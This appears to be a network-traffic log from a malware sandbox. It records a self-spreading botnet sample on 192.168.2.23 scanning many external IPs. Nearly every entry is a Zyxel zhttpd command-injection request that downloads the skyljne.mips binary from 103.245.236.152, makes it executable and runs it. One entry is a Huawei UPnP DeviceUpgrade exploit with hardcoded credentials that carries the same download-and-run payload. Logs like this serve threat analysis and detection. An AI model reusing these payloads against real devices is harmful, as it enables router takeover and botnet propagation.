                                          Jan 14, 2024 15:46:07.824255943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2573192.168.2.234561461.12.220.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824285030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2574192.168.2.2351502163.211.27.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824316978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2575192.168.2.235516878.204.203.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824343920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2576192.168.2.2344620107.52.37.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824351072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2577192.168.2.2340410138.152.47.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824433088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2578192.168.2.2360618169.108.82.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824433088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2579192.168.2.235365652.44.101.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824469090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2580192.168.2.2350684131.67.58.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824497938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2581192.168.2.2355480177.94.36.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828088045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2582192.168.2.235314283.73.197.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828114033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2583192.168.2.2358994200.13.50.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828176975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2584192.168.2.234251054.200.42.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828190088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2585192.168.2.233866890.131.27.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828205109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2586192.168.2.235529679.17.158.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828227043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2587192.168.2.2347272121.75.176.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828267097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2588192.168.2.23386642.128.209.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828290939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2589192.168.2.2344448202.187.245.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828309059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2590192.168.2.2348706172.142.28.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828325033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2591192.168.2.2335836163.205.54.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828325033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2592192.168.2.2354326172.68.207.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828360081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2593192.168.2.2355758183.142.225.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828368902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2594192.168.2.2356896101.81.99.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828413010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2595192.168.2.2352562186.135.17.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828598976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2596192.168.2.2342072132.64.41.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828655005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2597192.168.2.2358202186.196.51.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828655958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2598192.168.2.2345920223.68.95.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.828757048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2599192.168.2.2348218184.235.26.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:08.834072113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2600192.168.2.236074634.102.138.10237215
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.804102898 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 475
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2601192.168.2.235333487.4.211.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840465069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2602192.168.2.2358512213.28.75.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840476990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2603192.168.2.235150899.205.91.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840490103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2604192.168.2.2350872141.210.94.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840529919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2605192.168.2.2338064151.86.166.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840559006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2606192.168.2.2354184144.193.82.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840586901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2607192.168.2.2336880115.233.101.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840586901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2608192.168.2.235284835.54.245.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840615034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2609192.168.2.2350960145.115.1.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840631962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2610192.168.2.235532412.164.199.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840692997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2611192.168.2.2347798115.136.178.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840701103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2612192.168.2.234325097.91.205.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840761900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2613192.168.2.2348686162.94.114.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840764999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2614192.168.2.2353134206.183.115.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840804100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2615192.168.2.233711866.94.205.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840806007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2616192.168.2.234127694.232.196.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840835094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2617192.168.2.235145276.104.152.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840869904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2618192.168.2.235812259.179.137.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840887070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2619192.168.2.23381802.210.53.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840910912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2620192.168.2.233970288.95.250.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840934992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2621192.168.2.2338406207.196.0.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840965033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2622192.168.2.234246254.1.186.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.840998888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2623192.168.2.234688863.202.135.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841011047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2624192.168.2.234914631.247.90.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841062069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2625192.168.2.233613812.211.232.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841095924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2626192.168.2.235468298.7.67.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841104031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2627192.168.2.233701874.39.163.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841126919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2628192.168.2.2336122113.195.81.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.841157913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2629192.168.2.2349098175.104.202.251443
                                          TimestampBytes transferredDirectionData
